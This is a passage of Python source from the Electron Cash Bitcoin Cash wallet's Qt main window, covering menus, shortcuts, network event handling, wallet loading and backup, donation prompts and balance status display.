if self.config.get("is_maximized"):
self.showMaximized()
self.init_menubar()
wrtabs = Weak.ref(tabs) # We use a weak reference here to help along python gc of QShortcut children: prevent the lambdas below from holding a strong ref to self.
self._shortcuts.add( QShortcut(QKeySequence("Ctrl+W"), self, self.close) )
# Below is now added to the menu as Ctrl+R but we'll also support F5 like browsers do
self._shortcuts.add( QShortcut(QKeySequence("F5"), self, self.update_wallet) )
self._shortcuts.add( QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs() and wrtabs().setCurrentIndex((wrtabs().currentIndex() - 1)%wrtabs().count())) )
self._shortcuts.add( QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs() and wrtabs().setCurrentIndex((wrtabs().currentIndex() + 1)%wrtabs().count())) )
for i in range(tabs.count()):
self._shortcuts.add( QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs() and wrtabs().setCurrentIndex(i)) )
self.gui_object.cashaddr_toggled_signal.connect(self.update_cashaddr_icon)
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.gui_object.update_available_signal.connect(self.on_update_available) # shows/hides the update_available_button, emitted by update check mechanism when a new version is available
self.history_list.setFocus(True)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet()
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['blockchain_updated', 'wallet_updated',
'new_transaction', 'status', 'banner', 'verified2',
'fee', 'ca_verified_tx', 'ca_verification_failed']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
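# e.g. prefer register_callback(self.on_network, ...) over
# register_callback(partial(self.on_network), ...): a partial/lambda
# wrapper is a distinct object that cannot be matched up and
# unregistered later, so it would keep a reference to `self` alive.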
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
def setup_tx_rcv_sound(self):
"""Used only in the 'ard moné edition"""
if networks.net is not networks.TaxCoinNet:
return
try:
import PyQt5.QtMultimedia
from PyQt5.QtCore import QUrl, QResource
from PyQt5.QtMultimedia import QMediaPlayer, QMediaContent
fileName = os.path.join(os.path.dirname(__file__), "data", "ard_mone.mp3")
url = QUrl.fromLocalFile(fileName)
self.print_error("Sound effect: loading from", url.toLocalFile())
player = QMediaPlayer(self)
player.setMedia(QMediaContent(url))
player.setVolume(100)
self.print_error("Sound effect: regustered successfully")
return player
except Exception as e:
self.print_error("Sound effect: Failed:", str(e))
return
_first_shown = True
def showEvent(self, event):
super().showEvent(event)
if event.isAccepted() and self._first_shown:
self._first_shown = False
weakSelf = Weak.ref(self)
# do this immediately after this event handler finishes -- noop on everything but linux
def callback():
strongSelf = weakSelf()
if strongSelf:
strongSelf.gui_object.lin_win_maybe_show_highdpi_caveat_msg(strongSelf)
QTimer.singleShot(0, callback)
def on_history(self, event, *args):
# NB: event should always be 'on_history'
if not args or args[0] is self.wallet:
self.new_fx_history_signal.emit()
@rate_limited(3.0) # Rate limit to no more than once every 3 seconds
def on_fx_history(self):
if self.cleaned_up: return
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
@rate_limited(3.0) # Rate limit to no more than once every 3 seconds
def on_fx_quotes(self):
if self.cleaned_up: return
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
def toggle_tab(self, tab):
show = self.tabs.indexOf(tab) == -1
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_format = _("Hide {tab_description}") if show else _("Show {tab_description}")
item_text = item_format.format(tab_description=tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window, *, raise_if_missing=False):
try:
self.tl_windows.remove(window)
except ValueError:
if raise_if_missing:
raise
''' Window not in list. Suppressing the exception by default makes
writing cleanup handlers easier. Doing it this way fixes #1707. '''
def top_level_window(self):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
return self.top_level_window_recurse(override)
def diagnostic_name(self):
return "%s/%s" % (PrintError.diagnostic_name(self), self.wallet.basename())
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
try:
traceback.print_exception(*exc_info)
except OSError:
# Issue #662, user got IO error.
# We want them to still get the error displayed to them.
pass
self.show_error(str(exc_info[1]))
def on_network(self, event, *args):
#self.print_error("on_network:", event, *args)
if event == 'wallet_updated':
if args[0] is self.wallet:
self.need_update.set()
elif event == 'blockchain_updated':
self.need_update.set()
elif event == 'new_transaction':
self.tx_update_mgr.notif_add(args) # added only if this wallet's tx
if args[1] is self.wallet:
self.network_signal.emit(event, args)
elif event == 'verified2':
self.tx_update_mgr.verif_add(args) # added only if this wallet's tx
if args[0] is self.wallet:
self.network_signal.emit(event, args)
elif event in ['status', 'banner', 'fee']:
# Handle in GUI thread
self.network_signal.emit(event, args)
elif event in ('ca_verified_tx', 'ca_verification_failed'):
if args[0] is self.wallet.cashacct:
self.network_signal.emit(event, args)
else:
self.print_error("unexpected network message:", event, args)
def on_network_qt(self, event, args=None):
if self.cleaned_up: return
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'fee':
pass
elif event == 'new_transaction':
self.check_and_reset_receive_address_if_needed()
elif event in ('ca_verified_tx', 'ca_verification_failed'):
pass
elif event == 'verified2':
pass
else:
self.print_error("unexpected network_qt signal:", event, args)
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.daemon = True  # setDaemon() is deprecated
t.start()
def _close_wallet(self):
if self.wallet:
self.print_error('close_wallet', self.wallet.storage.path)
self.wallet.thread = None
run_hook('close_wallet', self.wallet)
def load_wallet(self):
self.wallet.thread = TaskThread(self, self.on_error, name = self.wallet.diagnostic_name() + '/Wallet')
self.update_recently_visited(self.wallet.storage.path)
# address used to create a dummy transaction and estimate transaction fee
self.history_list.update()
self.address_list.update()
self.utxo_list.update()
self.need_update.set()
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.tray.isVisible():
self.hide()
else:
self.show()
if self._is_invalid_testnet_wallet():
self.gui_object.daemon.stop_wallet(self.wallet.storage.path)
self._rebuild_history_action.setEnabled(False)
self._warn_if_invalid_testnet_wallet()
self.watching_only_changed()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
run_hook('load_wallet', self.wallet, self)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.print_error("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
title = '%s %s - %s' % (networks.net.TITLE,
self.wallet.electrum_version,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
self.warn_if_watching_only()
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.can_change_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoin Cash with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoin Cash to be sent to this wallet.")
])
self.show_warning(msg, title=_('Information'))
def _is_invalid_testnet_wallet(self):
if not networks.net.TESTNET:
return False
is_old_bad = False
xkey = ((hasattr(self.wallet, 'get_master_public_key') and self.wallet.get_master_public_key())
or None)
if xkey:
from electroncash.bitcoin import deserialize_xpub, InvalidXKeyFormat, InvalidXKeyNotBase58
try:
xp = deserialize_xpub(xkey)
except InvalidXKeyNotBase58:
pass # old_keystore uses some other key format, so we will let it slide.
except InvalidXKeyFormat:
is_old_bad = True
return is_old_bad
def _warn_if_invalid_testnet_wallet(self):
''' This was added after the upgrade from the bad xpub testnet wallets
to the good tpub testnet wallet format in version 3.3.6. See #1164.
We warn users if they are using the bad wallet format and instruct
them on how to upgrade their wallets.'''
is_old_bad = self._is_invalid_testnet_wallet()
if is_old_bad:
msg = ' '.join([
_("This testnet wallet has an invalid master key format."),
_("(Old versions of Electron Cash before 3.3.6 produced invalid testnet wallets)."),
'<br><br>',
_("In order to use this wallet without errors with this version of EC, please <b>re-generate this wallet from seed</b>."),
"<br><br><em><i>~SPV stopped~</i></em>"
])
self.show_critical(msg, title=_('Invalid Master Key'), rich_text=True)
return is_old_bad
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
if not os.path.exists(wallet_folder):
wallet_folder = None
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
if filename.lower().endswith('.txn'):
# they did File -> Open on a .txn, just do that.
self.do_process_from_file(fileName=filename)
return
self.gui_object.new_window(filename)
def backup_wallet(self):
self.wallet.storage.write() # make sure file is committed to disk
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
# Copy file contents
shutil.copyfile(path, new_path)
# Copy file attributes if possible
# (not supported on targets like Flatpak documents)
try:
shutil.copystat(path, new_path)
except (IOError, os.error):
pass
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except (IOError, os.error) as reason:
self.show_critical(_("Electron Cash was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent2 = []
for k in recent:
if os.path.exists(k):
recent2.append(k)
recent = recent2[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
gui_object = self.gui_object
for i, k in enumerate(recent):  # preserve most-recent-first order
b = os.path.basename(k)
def loader(k):
return lambda: gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return self.gui_object.get_wallet_folder()
def new_wallet(self):
try:
full_path = self.gui_object.get_new_wallet_path()
except FileNotFoundError as e:
self.show_error(str(e))
return
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = self.menuBar()
menubar.setObjectName(self.diagnostic_name() + ".QMenuBar")
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("Open &Recent"))
file_menu.addAction(_("&Open") + "...", self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore") + "...", self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy As") + "...", self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("&Delete") + "...", self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close).setShortcut(QKeySequence.Quit)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys, QKeySequence("Ctrl+I"))
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password") + "...", self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("Private Keys"))
self.private_keys_menu.addAction(_("&Sweep") + "...", self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import") + "...", self.do_import_privkey)
self.export_menu = self.private_keys_menu.addMenu(_("&Export"))
self.export_menu.addAction(_("&WIF Plaintext") + "...", self.export_privkeys_dialog)
self.export_menu.addAction(_("&BIP38 Encrypted") + "...", self.export_bip38_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses") + "...", self.import_addresses)
wallet_menu.addSeparator()
self._rebuild_history_action = wallet_menu.addAction(_("&Rebuild History") + "...", self.rebuild_history)
self._scan_beyond_gap_action = wallet_menu.addAction(_("Scan &More Addresses..."), self.scan_beyond_gap)
self._scan_beyond_gap_action.setEnabled(bool(self.wallet.is_deterministic() and self.network))
wallet_menu.addSeparator()
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import") + "...", self.do_import_labels)
labels_menu.addAction(_("&Export") + "...", self.do_export_labels)
contacts_menu = wallet_menu.addMenu(_("&Contacts"))
contacts_menu.addAction(_("&New") + "...", self.new_contact_dialog)
contacts_menu.addAction(_("Import") + "...", lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export") + "...", lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import") + "...", lambda: self.invoice_list.import_invoices())
hist_menu = wallet_menu.addMenu(_("&History"))
#hist_menu.addAction(_("Plot"), self.plot_history_dialog).setEnabled(plot_history is not None)
hist_menu.addAction(_("Export") + "...", self.export_history_dialog)
wallet_menu.addSeparator()
wallet_menu.addAction(_("&Find"), self.toggle_search, QKeySequence("Ctrl+F"))
wallet_menu.addAction(_("Refresh GUI"), self.update_wallet, QKeySequence("Ctrl+R"))
def add_toggle_action(view_menu, tab):
is_shown = self.tabs.indexOf(tab) > -1
item_format = _("Hide {tab_description}") if is_shown else _("Show {tab_description}")
item_name = item_format.format(tab_description=tab.tab_description)
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.converter_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
prefs_tit = _("Preferences") + "..."
a = tools_menu.addAction(prefs_tit, self.settings_dialog, QKeySequence("Ctrl+,") ) # Note: on macOS this hotkey sequence won't be shown in the menu (since it's reserved by the system), but will still work. :/
if sys.platform == 'darwin':
# This turns off the heuristic matching based on name and keeps the
# "Preferences" action out of the application menu and into the
# actual menu we specified on macOS.
a.setMenuRole(QAction.NoRole)
gui_object = self.gui_object
weakSelf = Weak.ref(self)
tools_menu.addAction(_("&Network") + "...", lambda: gui_object.show_network_dialog(weakSelf()), QKeySequence("Ctrl+K"))
tools_menu.addAction(_("Optional &Features") + "...", self.internal_plugins_dialog, QKeySequence("Shift+Ctrl+P"))
tools_menu.addAction(_("Installed &Plugins") + "...", self.external_plugins_dialog, QKeySequence("Ctrl+P"))
if sys.platform.startswith('linux'):
tools_menu.addSeparator()
tools_menu.addAction(_("&Hardware Wallet Support..."), self.hardware_wallet_support)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/Verify Message") + "...", self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/Decrypt Message") + "...", self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to Many"), self.paytomany, QKeySequence("Ctrl+M"))
raw_transaction_menu = tools_menu.addMenu(_("&Load Transaction"))
raw_transaction_menu.addAction(_("From &File") + "...", self.do_process_from_file)
raw_transaction_menu.addAction(_("From &Text") + "...", self.do_process_from_text, QKeySequence("Ctrl+T"))
raw_transaction_menu.addAction(_("From the &Blockchain") + "...", self.do_process_from_txid, QKeySequence("Ctrl+B"))
raw_transaction_menu.addAction(_("From &QR Code") + "...", self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
tools_menu.addSeparator()
if ColorScheme.dark_scheme and sys.platform != 'darwin': # use dark icon in menu except for on macOS where we can't be sure it will look right due to the way menus work on macOS
icon = QIcon(":icons/cashacct-button-darkmode.png")
else:
icon = QIcon(":icons/cashacct-logo.png")
tools_menu.addAction(icon, _("Lookup &Cash Account..."), self.lookup_cash_account_dialog, QKeySequence("Ctrl+L"))
tools_menu.addAction(icon, _("&Register Cash Account..."), lambda: self.register_new_cash_account(addr='pick'), QKeySequence("Ctrl+G"))
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("About Qt"), self.app.aboutQt)
help_menu.addAction(_("&Check for Updates"), lambda: self.gui_object.show_update_checker(self))
help_menu.addAction(_("&Official Website"), lambda: webopen("https://electroncash.org"))
help_menu.addSeparator()
help_menu.addAction(_("Documentation"), lambda: webopen("http://electroncash.readthedocs.io/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug..."), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to Server") + "...", self.donate_to_server)
def donate_to_server(self):
if self.gui_object.warn_if_no_network(self):
return
d = {}
spv_address = self.network.get_donation_address()
spv_prefix = _("Blockchain Server")
donation_for = _("Donation for")
if spv_address:
host = self.network.get_parameters()[0]
d[spv_prefix + ": " + host] = spv_address
plugin_servers = run_hook('donation_address', self, multi=True)
for tup in plugin_servers:
if not isinstance(tup, (list, tuple)) or len(tup) != 2:
continue
desc, address = tup
if (desc and address and isinstance(desc, str) and isinstance(address, Address)
and desc not in d and not desc.lower().startswith(spv_prefix.lower())):
d[desc] = address.to_ui_string()
def do_payto(desc):
addr = d[desc]
# The message is intentionally untranslated, leave it like that
self.pay_to_URI('{pre}:{addr}?message={donation_for} {desc}'
.format(pre = networks.net.CASHADDR_PREFIX,
addr = addr,
donation_for = donation_for,
desc = desc))
if len(d) == 1:
do_payto(next(iter(d.keys())))
elif len(d) > 1:
choices = tuple(d.keys())
index = self.query_choice(_('Please select which server you would like to donate to:'), choices, add_cancel_button = True)
if index is not None:
do_payto(choices[index])
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electron Cash",
"<p><font size=+3><b>Electron Cash</b></font></p><p>" + _("Version") + f" {self.wallet.electrum_version}" + "</p>" +
'<span style="font-size:11pt; font-weight:500;"><p>' +
_("Copyright © {year_start}-{year_end} Electron Cash LLC and the Electron Cash developers.").format(year_start=2017, year_end=2021) +
"</p><p>" + _("darkdetect for macOS © 2019 Alberto Sottile") + "</p>"
"</span>" +
'<span style="font-weight:200;"><p>' +
_("Electron Cash's focus is speed, with low resource usage and simplifying Bitcoin Cash. You do not need to perform regular backups, because your wallet can be recovered from a secret phrase that you can memorize or write on paper. Startup times are instant because it operates in conjunction with high-performance servers that handle the most complicated parts of the Bitcoin Cash system.") +
"</p></span>"
)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=\"https://github.com/Electron-Cash/Electron-Cash/issues\">https://github.com/Electron-Cash/Electron-Cash/issues</a><br/><br/>",
_("Before reporting a bug, upgrade to the most recent version of Electron Cash (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electron Cash - " + _("Reporting Bugs"), rich_text = True)
def notify(self, message):
self.gui_object.notify(message)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
return __class__.static_getOpenFileName(title=title, filter=filter, config=self.config, parent=self)
def getSaveFileName(self, title, filename, filter = ""):
return __class__.static_getSaveFileName(title=title, filename=filename, filter=filter, config=self.config, parent=self)
@staticmethod
def static_getOpenFileName(*, title, parent=None, config=None, filter=""):
if not config:
config = get_config()
userdir = os.path.expanduser('~')
directory = config.get('io_dir', userdir) if config else userdir
fileName, __ = QFileDialog.getOpenFileName(parent, title, directory, filter)
if fileName and directory != os.path.dirname(fileName) and config:
config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
@staticmethod
def static_getSaveFileName(*, title, filename, parent=None, config=None, filter=""):
if not config:
config = get_config()
userdir = os.path.expanduser('~')
directory = config.get('io_dir', userdir) if config else userdir
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(parent, title, path, filter)
if fileName and directory != os.path.dirname(fileName) and config:
config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
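# Usage sketch (hypothetical filter): both wrappers remember the last used
# directory via the 'io_dir' config key, e.g.:
#   fn = self.getSaveFileName(_("Export labels"), "labels.json", "*.json")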
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self._update_wallet() # will clear flag when it runs. (also clears labels_need_update as well)
if self.labels_need_update.is_set():
self._update_labels() # will clear flag when it runs.
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
# hook for other classes to be called here. For example the tx_update_mgr is called here (see TxUpdateMgr.do_check).
self.on_timer_signal.emit()
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount, is_diff=False):
text = self.format_amount(amount, is_diff=is_diff) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount, is_diff=is_diff)
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
sats_per_byte = format_fee_satoshis(fee_rate/1000, max(self.num_zeros, 1))
return _('{sats_per_byte} sat/byte').format(sats_per_byte=sats_per_byte)
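# Worked example: fee_rate is expressed in satoshis per 1000 bytes, so a
# fee_rate of 1000 displays as 1 sat/byte (1000 / 1000).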
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
if self.decimal_point in util.inv_base_units:
return util.inv_base_units[self.decimal_point]
raise Exception('Unknown base unit')
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else None
if rate is None or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / PyDecimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * PyDecimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
_network_status_tip_dict = dict()
def update_status(self):
if not self.wallet:
return
icon_dict = ElectrumWindow.status_icon_dict
if not icon_dict:
# cache the icons to save on CPU overhead per update_status call
icon_dict.update({
"status_disconnected" : QIcon(":icons/status_disconnected.svg"),
"status_waiting" : QIcon(":icons/status_waiting.svg"),
"status_lagging" : QIcon(":icons/status_lagging.svg"),
"status_lagging_fork" : QIcon(":icons/status_lagging_fork.svg"),
"status_connected" : QIcon(":icons/status_connected.svg"),
"status_connected_fork" : QIcon(":icons/status_connected_fork.svg"),
"status_connected_proxy" : QIcon(":icons/status_connected_proxy.svg"),
"status_connected_proxy_fork" : QIcon(":icons/status_connected_proxy_fork.svg"),
})
status_tip_dict = ElectrumWindow._network_status_tip_dict
if not status_tip_dict:
# Since we're caching stuff, might as well cache this too
status_tip_dict.update({
"status_disconnected" : _('Network Status') + " - " + _("Offline"),
"status_waiting" : _('Network Status') + " - " + _("Updating..."),
"status_lagging" : _('Network Status') + " - " + '',
"status_lagging_fork" : _('Network Status') + " - " + _("Chain fork(s) detected"),
"status_connected" : _('Network Status') + " - " + _("Connected"),
"status_connected_fork" : _('Network Status') + " - " + _("Chain fork(s) detected"),
"status_connected_proxy" : _('Network Status') + " - " + _("Connected via proxy"),
"status_connected_proxy_fork" : _('Network Status') + " - " + _("Connected via proxy") + "; " + _("Chain fork(s) detected"),
})
status_tip = ''
if self.network is None or not self.network.is_running():
text = _("Offline")
icon = icon_dict["status_disconnected"]
status_tip = status_tip_dict['status_disconnected']
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
num_chains = len(self.network.get_blockchains())
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
text = _("Synchronizing...")
icon = icon_dict["status_waiting"]
status_tip = status_tip_dict["status_waiting"]
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
if num_chains <= 1:
icon = icon_dict["status_lagging"]
status_tip = status_tip_dict["status_lagging"] + text
else:
icon = icon_dict["status_lagging_fork"]
status_tip = status_tip_dict["status_lagging_fork"] + "; " + text
else:
c, u, x = self.wallet.get_balance()
text_items = [
_("Balance: {amount_and_unit}").format(
amount_and_unit=self.format_amount_and_units(c))
]
if u:
text_items.append(_("[{amount} unconfirmed]").format(
amount=self.format_amount(u, True).strip()))
if x:
text_items.append(_("[{amount} unmatured]").format(
amount=self.format_amount(x, True).strip()))
extra = run_hook("balance_label_extra", self)
if isinstance(extra, str) and extra:
text_items.append(_("[{extra}]").format(extra=extra))
# append fiat balance and price
if self.fx.is_enabled():
fiat_text = self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()).strip()
if fiat_text:
text_items.append(fiat_text)
n_unverif = self.wallet.get_unverified_tx_pending_count()
if n_unverif >= 10:
# if there are lots left to verify, display this informative text
text_items.append(_("[{count} unverified TXs]").format(count=n_unverif))
if not self.network.proxy:
icon = icon_dict["status_connected"] if num_chains <= 1 else icon_dict["status_connected_fork"]
status_tip = status_tip_dict["status_connected"] if num_chains <= 1 else status_tip_dict["status_connected_fork"]
else:
icon = icon_dict["status_connected_proxy"] if num_chains <= 1 else icon_dict["status_connected_proxy_fork"]
status_tip = status_tip_dict["status_connected_proxy"] if num_chains <= 1 else status_tip_dict["status_connected_proxy_fork"]
text = ' '.join(text_items)
else:
text = _("Not connected")
icon = icon_dict["status_disconnected"]
status_tip = status_tip_dict["status_disconnected"]
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon(icon)
self.status_button.setStatusTip( status_tip )
run_hook('window_update_status', self)
def update_wallet(self):
self.need_update.set() # will enqueue an _update_wallet() call in at most 0.5 seconds from now.
def _update_wallet(self):
''' Called by self.timer_actions every 0.5 secs if need_update flag is set.
Note that the flag is actually cleared by update_tabs.'''
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
@rate_limited(1.0, classlevel=True, ts_after=True) # Limit tab updates to no more than 1 per second, app-wide. Multiple calls across instances will be collated into 1 deferred series of calls (1 call per extant instance)
def update_tabs(self):
if self.cleaned_up: return
self.history_list.update()
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history, also clears self.tx_update_mgr.verif_q
self.need_update.clear() # clear flag
if self.labels_need_update.is_set():
# if flag was set, might as well declare the labels updated since they necessarily were due to a full update.
self.labels_updated_signal.emit() # just in case client code was waiting for this signal to proceed.
self.labels_need_update.clear() # clear flag
def update_labels(self):
self.labels_need_update.set() # will enqueue an _update_labels() call in at most 0.5 seconds from now
@rate_limited(1.0)
def _update_labels(self):
''' Called by self.timer_actions every 0.5 secs if labels_need_update flag is set. '''
if self.cleaned_up: return
self.history_list.update_labels()
self.address_list.update_labels()
self.utxo_list.update_labels()
self.update_completions()
self.labels_updated_signal.emit()
self.labels_need_update.clear() # clear flag
def create_history_tab(self):
from .history_list import HistoryList
self.history_list = l = HistoryList(self)
l.searchable_list = l
return l
def show_address(self, addr, *, parent=None):
parent = parent or self.top_level_window()
from . import address_dialog
d = address_dialog.AddressDialog(self, addr, windowParent=parent)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
